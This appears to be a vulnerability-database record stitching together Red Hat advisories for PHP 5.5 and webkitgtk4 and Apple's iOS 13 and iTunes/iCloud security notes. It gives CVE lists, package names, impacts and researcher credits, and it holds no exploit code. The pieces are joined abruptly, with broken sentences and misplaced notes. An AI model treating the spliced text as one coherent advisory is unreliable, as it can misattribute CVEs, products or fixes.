php55-php-opcache-5.5.21-2.el7.x86_64.rpm
php55-php-pdo-5.5.21-2.el7.x86_64.rpm
php55-php-pgsql-5.5.21-2.el7.x86_64.rpm
php55-php-process-5.5.21-2.el7.x86_64.rpm
php55-php-pspell-5.5.21-2.el7.x86_64.rpm
php55-php-recode-5.5.21-2.el7.x86_64.rpm
php55-php-snmp-5.5.21-2.el7.x86_64.rpm
php55-php-soap-5.5.21-2.el7.x86_64.rpm
php55-php-xml-5.5.21-2.el7.x86_64.rpm
php55-php-xmlrpc-5.5.21-2.el7.x86_64.rpm
php55-runtime-2.0-1.el7.x86_64.rpm
php55-scldevel-2.0-1.el7.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2014-8142
https://access.redhat.com/security/cve/CVE-2014-9427
https://access.redhat.com/security/cve/CVE-2014-9652
https://access.redhat.com/security/cve/CVE-2014-9705
https://access.redhat.com/security/cve/CVE-2014-9709
https://access.redhat.com/security/cve/CVE-2015-0231
https://access.redhat.com/security/cve/CVE-2015-0232
https://access.redhat.com/security/cve/CVE-2015-0273
https://access.redhat.com/security/cve/CVE-2015-1351
https://access.redhat.com/security/cve/CVE-2015-1352
https://access.redhat.com/security/cve/CVE-2015-2301
https://access.redhat.com/security/cve/CVE-2015-2305
https://access.redhat.com/security/cve/CVE-2015-2348
https://access.redhat.com/security/cve/CVE-2015-2787
https://access.redhat.com/security/cve/CVE-2015-4147
https://access.redhat.com/security/cve/CVE-2015-4148
https://access.redhat.com/security/updates/classification/#moderate
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFVcBWDXlSAg2UNWIIRAnzoAJ9qn4wDNXMD8JU1N7k7nEzKlPpGDwCgi0Si
MD3ZncY/P8Pl6+DgQxJQCjo=
=MxfY
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
|
|
var-201912-1862
|
Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution. Apple Has released an update for each product.The expected impact depends on each vulnerability, but can be affected as follows: * information leak * Falsification of information * Arbitrary code execution * Service operation interruption (DoS) * Privilege escalation * Authentication bypass. The product supports storage of music, photos, App and contacts, etc. There are security vulnerabilities in the WebKit component of Apple iTunes versions prior to 12.10.1, iCloud versions prior to 7.14, and versions prior to 10.7 based on the Windows platform.
Entry added October 29, 2019
boringssl
We would like to acknowledge Nimrod Aviram of Tel Aviv University,
Robert Merget of Ruhr University Bochum, Juraj Somorovsky of Ruhr
University Bochum and Thijs Alkemade (@xnyhps) of Computest for their
assistance. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: webkitgtk4 security, bug fix, and enhancement update
Advisory ID: RHSA-2020:4035-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2020:4035
Issue date: 2020-09-29
CVE Names: CVE-2019-6237 CVE-2019-6251 CVE-2019-8506
CVE-2019-8524 CVE-2019-8535 CVE-2019-8536
CVE-2019-8544 CVE-2019-8551 CVE-2019-8558
CVE-2019-8559 CVE-2019-8563 CVE-2019-8571
CVE-2019-8583 CVE-2019-8584 CVE-2019-8586
CVE-2019-8587 CVE-2019-8594 CVE-2019-8595
CVE-2019-8596 CVE-2019-8597 CVE-2019-8601
CVE-2019-8607 CVE-2019-8608 CVE-2019-8609
CVE-2019-8610 CVE-2019-8611 CVE-2019-8615
CVE-2019-8619 CVE-2019-8622 CVE-2019-8623
CVE-2019-8625 CVE-2019-8644 CVE-2019-8649
CVE-2019-8658 CVE-2019-8666 CVE-2019-8669
CVE-2019-8671 CVE-2019-8672 CVE-2019-8673
CVE-2019-8674 CVE-2019-8676 CVE-2019-8677
CVE-2019-8678 CVE-2019-8679 CVE-2019-8680
CVE-2019-8681 CVE-2019-8683 CVE-2019-8684
CVE-2019-8686 CVE-2019-8687 CVE-2019-8688
CVE-2019-8689 CVE-2019-8690 CVE-2019-8707
CVE-2019-8710 CVE-2019-8719 CVE-2019-8720
CVE-2019-8726 CVE-2019-8733 CVE-2019-8735
CVE-2019-8743 CVE-2019-8763 CVE-2019-8764
CVE-2019-8765 CVE-2019-8766 CVE-2019-8768
CVE-2019-8769 CVE-2019-8771 CVE-2019-8782
CVE-2019-8783 CVE-2019-8808 CVE-2019-8811
CVE-2019-8812 CVE-2019-8813 CVE-2019-8814
CVE-2019-8815 CVE-2019-8816 CVE-2019-8819
CVE-2019-8820 CVE-2019-8821 CVE-2019-8822
CVE-2019-8823 CVE-2019-8835 CVE-2019-8844
CVE-2019-8846 CVE-2019-11070 CVE-2020-3862
CVE-2020-3864 CVE-2020-3865 CVE-2020-3867
CVE-2020-3868 CVE-2020-3885 CVE-2020-3894
CVE-2020-3895 CVE-2020-3897 CVE-2020-3899
CVE-2020-3900 CVE-2020-3901 CVE-2020-3902
CVE-2020-10018 CVE-2020-11793
====================================================================
1. Summary:
An update for webkitgtk4 is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch
3. Description:
WebKitGTK+ is port of the WebKit portable web rendering engine to the GTK+
platform. These packages provide WebKitGTK+ for GTK+ 3.
The following packages have been upgraded to a later upstream version:
webkitgtk4 (2.28.2). (BZ#1817144)
Security Fix(es):
* webkitgtk: Multiple security issues (CVE-2019-6237, CVE-2019-6251,
CVE-2019-8506, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536, CVE-2019-8544,
CVE-2019-8551, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563, CVE-2019-8571,
CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594,
CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8607,
CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615,
CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8625, CVE-2019-8644,
CVE-2019-8649, CVE-2019-8658, CVE-2019-8666, CVE-2019-8669, CVE-2019-8671,
CVE-2019-8672, CVE-2019-8673, CVE-2019-8674, CVE-2019-8676, CVE-2019-8677,
CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8683,
CVE-2019-8684, CVE-2019-8686, CVE-2019-8687, CVE-2019-8688, CVE-2019-8689,
CVE-2019-8690, CVE-2019-8707, CVE-2019-8710, CVE-2019-8719, CVE-2019-8720,
CVE-2019-8726, CVE-2019-8733, CVE-2019-8735, CVE-2019-8743, CVE-2019-8763,
CVE-2019-8764, CVE-2019-8765, CVE-2019-8766, CVE-2019-8768, CVE-2019-8769,
CVE-2019-8771, CVE-2019-8782, CVE-2019-8783, CVE-2019-8808, CVE-2019-8811,
CVE-2019-8812, CVE-2019-8813, CVE-2019-8814, CVE-2019-8815, CVE-2019-8816,
CVE-2019-8819, CVE-2019-8820, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823,
CVE-2019-8835, CVE-2019-8844, CVE-2019-8846, CVE-2019-11070, CVE-2020-3862,
CVE-2020-3864, CVE-2020-3865, CVE-2020-3867, CVE-2020-3868, CVE-2020-3885,
CVE-2020-3894, CVE-2020-3895, CVE-2020-3897, CVE-2020-3899, CVE-2020-3900,
CVE-2020-3901, CVE-2020-3902, CVE-2020-10018, CVE-2020-11793)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 7.9 Release Notes linked from the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-2.el7.noarch.rpm
x86_64:
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-2.el7.noarch.rpm
x86_64:
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
ppc64:
webkitgtk4-2.28.2-2.el7.ppc.rpm
webkitgtk4-2.28.2-2.el7.ppc64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc64.rpm
webkitgtk4-jsc-2.28.2-2.el7.ppc.rpm
webkitgtk4-jsc-2.28.2-2.el7.ppc64.rpm
ppc64le:
webkitgtk4-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-devel-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-jsc-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.ppc64le.rpm
s390x:
webkitgtk4-2.28.2-2.el7.s390.rpm
webkitgtk4-2.28.2-2.el7.s390x.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.s390.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.s390x.rpm
webkitgtk4-jsc-2.28.2-2.el7.s390.rpm
webkitgtk4-jsc-2.28.2-2.el7.s390x.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-2.el7.noarch.rpm
ppc64:
webkitgtk4-debuginfo-2.28.2-2.el7.ppc.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc64.rpm
webkitgtk4-devel-2.28.2-2.el7.ppc.rpm
webkitgtk4-devel-2.28.2-2.el7.ppc64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.ppc.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.ppc64.rpm
s390x:
webkitgtk4-debuginfo-2.28.2-2.el7.s390.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.s390x.rpm
webkitgtk4-devel-2.28.2-2.el7.s390.rpm
webkitgtk4-devel-2.28.2-2.el7.s390x.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.s390.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.s390x.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-2.el7.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2019-6237
https://access.redhat.com/security/cve/CVE-2019-6251
https://access.redhat.com/security/cve/CVE-2019-8506
https://access.redhat.com/security/cve/CVE-2019-8524
https://access.redhat.com/security/cve/CVE-2019-8535
https://access.redhat.com/security/cve/CVE-2019-8536
https://access.redhat.com/security/cve/CVE-2019-8544
https://access.redhat.com/security/cve/CVE-2019-8551
https://access.redhat.com/security/cve/CVE-2019-8558
https://access.redhat.com/security/cve/CVE-2019-8559
https://access.redhat.com/security/cve/CVE-2019-8563
https://access.redhat.com/security/cve/CVE-2019-8571
https://access.redhat.com/security/cve/CVE-2019-8583
https://access.redhat.com/security/cve/CVE-2019-8584
https://access.redhat.com/security/cve/CVE-2019-8586
https://access.redhat.com/security/cve/CVE-2019-8587
https://access.redhat.com/security/cve/CVE-2019-8594
https://access.redhat.com/security/cve/CVE-2019-8595
https://access.redhat.com/security/cve/CVE-2019-8596
https://access.redhat.com/security/cve/CVE-2019-8597
https://access.redhat.com/security/cve/CVE-2019-8601
https://access.redhat.com/security/cve/CVE-2019-8607
https://access.redhat.com/security/cve/CVE-2019-8608
https://access.redhat.com/security/cve/CVE-2019-8609
https://access.redhat.com/security/cve/CVE-2019-8610
https://access.redhat.com/security/cve/CVE-2019-8611
https://access.redhat.com/security/cve/CVE-2019-8615
https://access.redhat.com/security/cve/CVE-2019-8619
https://access.redhat.com/security/cve/CVE-2019-8622
https://access.redhat.com/security/cve/CVE-2019-8623
https://access.redhat.com/security/cve/CVE-2019-8625
https://access.redhat.com/security/cve/CVE-2019-8644
https://access.redhat.com/security/cve/CVE-2019-8649
https://access.redhat.com/security/cve/CVE-2019-8658
https://access.redhat.com/security/cve/CVE-2019-8666
https://access.redhat.com/security/cve/CVE-2019-8669
https://access.redhat.com/security/cve/CVE-2019-8671
https://access.redhat.com/security/cve/CVE-2019-8672
https://access.redhat.com/security/cve/CVE-2019-8673
https://access.redhat.com/security/cve/CVE-2019-8674
https://access.redhat.com/security/cve/CVE-2019-8676
https://access.redhat.com/security/cve/CVE-2019-8677
https://access.redhat.com/security/cve/CVE-2019-8678
https://access.redhat.com/security/cve/CVE-2019-8679
https://access.redhat.com/security/cve/CVE-2019-8680
https://access.redhat.com/security/cve/CVE-2019-8681
https://access.redhat.com/security/cve/CVE-2019-8683
https://access.redhat.com/security/cve/CVE-2019-8684
https://access.redhat.com/security/cve/CVE-2019-8686
https://access.redhat.com/security/cve/CVE-2019-8687
https://access.redhat.com/security/cve/CVE-2019-8688
https://access.redhat.com/security/cve/CVE-2019-8689
https://access.redhat.com/security/cve/CVE-2019-8690
https://access.redhat.com/security/cve/CVE-2019-8707
https://access.redhat.com/security/cve/CVE-2019-8710
https://access.redhat.com/security/cve/CVE-2019-8719
https://access.redhat.com/security/cve/CVE-2019-8720
https://access.redhat.com/security/cve/CVE-2019-8726
https://access.redhat.com/security/cve/CVE-2019-8733
https://access.redhat.com/security/cve/CVE-2019-8735
https://access.redhat.com/security/cve/CVE-2019-8743
https://access.redhat.com/security/cve/CVE-2019-8763
https://access.redhat.com/security/cve/CVE-2019-8764
https://access.redhat.com/security/cve/CVE-2019-8765
https://access.redhat.com/security/cve/CVE-2019-8766
https://access.redhat.com/security/cve/CVE-2019-8768
https://access.redhat.com/security/cve/CVE-2019-8769
https://access.redhat.com/security/cve/CVE-2019-8771
https://access.redhat.com/security/cve/CVE-2019-8782
https://access.redhat.com/security/cve/CVE-2019-8783
https://access.redhat.com/security/cve/CVE-2019-8808
https://access.redhat.com/security/cve/CVE-2019-8811
https://access.redhat.com/security/cve/CVE-2019-8812
https://access.redhat.com/security/cve/CVE-2019-8813
https://access.redhat.com/security/cve/CVE-2019-8814
https://access.redhat.com/security/cve/CVE-2019-8815
https://access.redhat.com/security/cve/CVE-2019-8816
https://access.redhat.com/security/cve/CVE-2019-8819
https://access.redhat.com/security/cve/CVE-2019-8820
https://access.redhat.com/security/cve/CVE-2019-8821
https://access.redhat.com/security/cve/CVE-2019-8822
https://access.redhat.com/security/cve/CVE-2019-8823
https://access.redhat.com/security/cve/CVE-2019-8835
https://access.redhat.com/security/cve/CVE-2019-8844
https://access.redhat.com/security/cve/CVE-2019-8846
https://access.redhat.com/security/cve/CVE-2019-11070
https://access.redhat.com/security/cve/CVE-2020-3862
https://access.redhat.com/security/cve/CVE-2020-3864
https://access.redhat.com/security/cve/CVE-2020-3865
https://access.redhat.com/security/cve/CVE-2020-3867
https://access.redhat.com/security/cve/CVE-2020-3868
https://access.redhat.com/security/cve/CVE-2020-3885
https://access.redhat.com/security/cve/CVE-2020-3894
https://access.redhat.com/security/cve/CVE-2020-3895
https://access.redhat.com/security/cve/CVE-2020-3897
https://access.redhat.com/security/cve/CVE-2020-3899
https://access.redhat.com/security/cve/CVE-2020-3900
https://access.redhat.com/security/cve/CVE-2020-3901
https://access.redhat.com/security/cve/CVE-2020-3902
https://access.redhat.com/security/cve/CVE-2020-10018
https://access.redhat.com/security/cve/CVE-2020-11793
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.9_release_notes/index
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc.
Installation note:
Safari 13 may be obtained from the Mac App Store. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2019-10-29-6 Additional information
for APPLE-SA-2019-9-26-3 iOS 13
iOS 13 addresses the following:
Bluetooth
Available for: iPhone 6s and later
Impact: Notification previews may show on Bluetooth accessories even
when previews are disabled
Description: A logic issue existed with the display of notification
previews. This issue was addressed with improved validation.
CVE-2019-8711: Arjang of MARK ANTHONY GROUP INC., Cemil Ozkebapci
(@cemilozkebapci) of Garanti BBVA, Oguzhan Meral of Deloitte
Consulting, Ömer Bozdoğan-Ramazan Atıl Anadolu Lisesi
Adana/TÜRKİYE
CFNetwork
Available for: iPhone 6s and later
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: This issue was addressed with improved checks.
CVE-2019-8753: Łukasz Pilorz of Standard Chartered GBS Poland
Entry added October 29, 2019
CoreAudio
Available for: iPhone 6s and later
Impact: Processing a maliciously crafted movie may result in the
disclosure of process memory
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-8705: riusksk of VulWar Corp working with Trend Micro's Zero
Day Initiative
CoreCrypto
Available for: iPhone 6s and later
Impact: Processing a large input may lead to a denial of service
Description: A denial of service issue was addressed with improved
input validation.
CVE-2019-8825: Found by GWP-ASan in Google Chrome
Entry added October 29, 2019
Face ID
Available for: iPhone 6s and later
Impact: A 3D model constructed to look like the enrolled user may
authenticate via Face ID
Description: This issue was addressed by improving Face ID machine
learning models.
CVE-2019-8760: Wish Wu (吴潍浠 @wish_wu) of Ant-financial
Light-Year Security Lab
Foundation
Available for: iPhone 6s and later
Impact: A remote attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8641: Samuel Groß and Natalie Silvanovich of Google Project
Zero
CVE-2019-8746: Natalie Silvanovich and Samuel Groß of Google Project
Zero
Entry added October 29, 2019
IOUSBDeviceFamily
Available for: iPhone 6s and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8718: Joshua Hill and Sem Voigtländer
Entry added October 29, 2019
Kernel
Available for: iPhone 6s and later
Impact: A local app may be able to read a persistent account
identifier
Description: A validation issue was addressed with improved logic.
CVE-2019-8809: Apple
Entry added October 29, 2019
Kernel
Available for: iPhone 6s and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8709: derrek (@derrekr6)
[confirmed]derrek (@derrekr6)
Entry added October 29, 2019
Kernel
Available for: iPhone 6s and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8717: Jann Horn of Google Project Zero
Entry added October 29, 2019
Kernel
Available for: iPhone 6s and later
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8712: Mohamed Ghannam (@_simo36)
Entry added October 29, 2019
Kernel
Available for: iPhone 6s and later
Impact: A malicious application may be able to determine kernel
memory layout
Description: A memory corruption issue existed in the handling of
IPv6 packets.
CVE-2019-8744: Zhuo Liang of Qihoo 360 Vulcan Team
Entry added October 29, 2019
Keyboards
Available for: iPhone 6s and later
Impact: A local user may be able to leak sensitive user information
Description: An authentication issue was addressed with improved
state management.
CVE-2019-8749: found by OSS-Fuzz
CVE-2019-8756: found by OSS-Fuzz
Entry added October 29, 2019
Messages
Available for: iPhone 6s and later
Impact: A person with physical access to an iOS device may be able to
access contacts from the lock screen
Description: The issue was addressed by restricting options offered
on a locked device.
CVE-2019-8742: videosdebarraquito
Notes
Available for: iPhone 6s and later
Impact: A local user may be able to view a user's locked notes
Description: The contents of locked notes sometimes appeared in
search results. This issue was addressed with improved data cleanup.
CVE-2019-8730: Jamie Blumberg (@jamie_blumberg) of Virginia
Polytechnic Institute and State University
Entry added October 29, 2019
PluginKit
Available for: iPhone 6s and later
Impact: A local user may be able to check for the existence of
arbitrary files
Description: A logic issue was addressed with improved restrictions.
CVE-2019-8708: an anonymous researcher
Entry added October 29, 2019
PluginKit
Available for: iPhone 6s and later
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8715: an anonymous researcher
Entry added October 29, 2019
Quick Look
Available for: iPhone 6s and later
Impact: Processing a maliciously crafted file may disclose user
information
Description: A permissions issue existed in which execute permission
was incorrectly granted. This issue was addressed with improved
permission validation.
CVE-2019-8731: Saif Hamed Hamdan Al Hinai of Oman National CERT,
Yiğit Can YILMAZ (@yilmazcanyigit)
Safari
Available for: iPhone 6s and later
Impact: Visiting a malicious website may lead to address bar spoofing
Description: A logic issue was addressed with improved state
management.
CVE-2019-8745: riusksk of VulWar Corp working with Trend Micro's Zero
Day Initiative
Entry added October 29, 2019
WebKit
Available for: iPhone 6s and later
Impact: Maliciously crafted web content may violate iframe sandboxing
policy
Description: This issue was addressed with improved iframe sandbox
enforcement.
CVE-2019-8707: an anonymous researcher working with Trend Micro's
Zero Day Initiative, cc working with Trend Micro Zero Day Initiative
CVE-2019-8726: Jihui Lu of Tencent KeenLab
CVE-2019-8728: Junho Jang of LINE Security Team and Hanul Choi of
ABLY Corporation
CVE-2019-8733: Sergei Glazunov of Google Project Zero
CVE-2019-8734: found by OSS-Fuzz
CVE-2019-8735: G. Geshev working with Trend Micro Zero Day Initiative
Entry added October 29, 2019
WebKit
Available for: iPhone 6s and later
Impact: A user may be unable to delete browsing history items
Description: "Clear History and Website Data" did not clear the
history. The issue was addressed with improved data deletion.
CVE-2019-8768: Hugo S. Diaz (coldpointblue)
Entry added October 29, 2019
WebKit
Available for: iPhone 6s and later
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved state
management.
CVE-2019-8625: Sergei Glazunov of Google Project Zero
CVE-2019-8719: Sergei Glazunov of Google Project Zero
CVE-2019-8764: Sergei Glazunov of Google Project Zero
Entry added October 29, 2019
WebKit Page Loading
Available for: iPhone 6s and later
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved state
management.
CVE-2019-8674: Sergei Glazunov of Google Project Zero
Additional recognition
AppleRTC
We would like to acknowledge Vitaly Cheptsov for their assistance.
Audio
We would like to acknowledge riusksk of VulWar Corp working with
Trend Micro's Zero Day Initiative for their assistance.
Bluetooth
We would like to acknowledge Jan Ruge of TU Darmstadt, Secure Mobile
Networking Lab, Jiska Classen of TU Darmstadt, Secure Mobile
Networking Lab, Francesco Gringoli of University of Brescia, Dennis
Heinze of TU Darmstadt, Secure Mobile Networking Lab for their
assistance.
boringssl
We would like to acknowledge Thijs Alkemade (@xnyhps) of Computest
for their assistance.
Control Center
We would like to acknowledge Brandon Sellers for their assistance.
HomeKit
We would like to acknowledge Tian Zhang for their assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Keyboard
We would like to acknowledge an anonymous researcher for their
assistance.
Mail
We would like to acknowledge Kenneth Hyndycz for their assistance.
mDNSResponder
We would like to acknowledge Gregor Lang of e.solutions GmbH for
their assistance.
Profiles
We would like to acknowledge Erik Johnson of Vernon Hills High School
and James Seeley (@Code4iOS) of Shriver Job Corps for their
assistance.
SafariViewController
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
VPN
We would like to acknowledge Royce Gawron of Second Son Consulting,
Inc. for their assistance.
WebKit
We would like to acknowledge MinJeong Kim of Information Security
Lab, Chungnam National University, JaeCheol Ryou of the Information
Security Lab, Chungnam National University in South Korea, Yiğit Can
YILMAZ (@yilmazcanyigit), Zhihua Yao of DBAPPSecurity Zion Lab, an
anonymous researcher, and cc working with Trend Micro's Zero Day
Initiative for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 13".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEM5FaaFRjww9EJgvRBz4uGe3y0M0FAl24s3oACgkQBz4uGe3y
0M1GMxAAnwBO9htU2i7+SHsXiEt2xJbjilLMM9V5LObjUWqaHXOxdQuYiPxFy9lR
neTOHwR2z1f3L3UPkGut28i24w7fwHVBdFh7w5p5RXlBf7tcRmFhKBUkYIhQ90Qj
jO6DXiCL9InCBVs2nW9Fr4yYV13kdoES6MfguyldGVpQMkyUcZ3F2XK0RCHNqEgz
h+1dR/uws3Ce+HNbb7wnqe4UzAI5DJUR/vH98+fWTl5P6CCaoZrv53vaxErLRBXi
gn/4rtzw+wDlThlrpkE5MwxmvLMF2ZqjUhOSVzKb3qXK+RFgE9FH8SKEBKkCxAa+
8/vZu+zdbN6KCzO608TXH9rNO2LbtQqTlO/jHGTJ30UEaKo9PyFozGkCE6XkWmFU
xtayVkSL08drJEgm+CB80g//hr2CESF0fMHFe8yQYeN2uL5yQxoavyub8E/nPKn1
v32Z6Z2fpGzP3eCLYbV93cBcdJaeXTdib47vvodyYFfFEja7xrv0AvPAbSSm98DK
VtFw3eNAKRbmIEAeY4b1uhdB+qUiqMEWqh0sd97+chY2Do90/4IG/3caLc0pTpDt
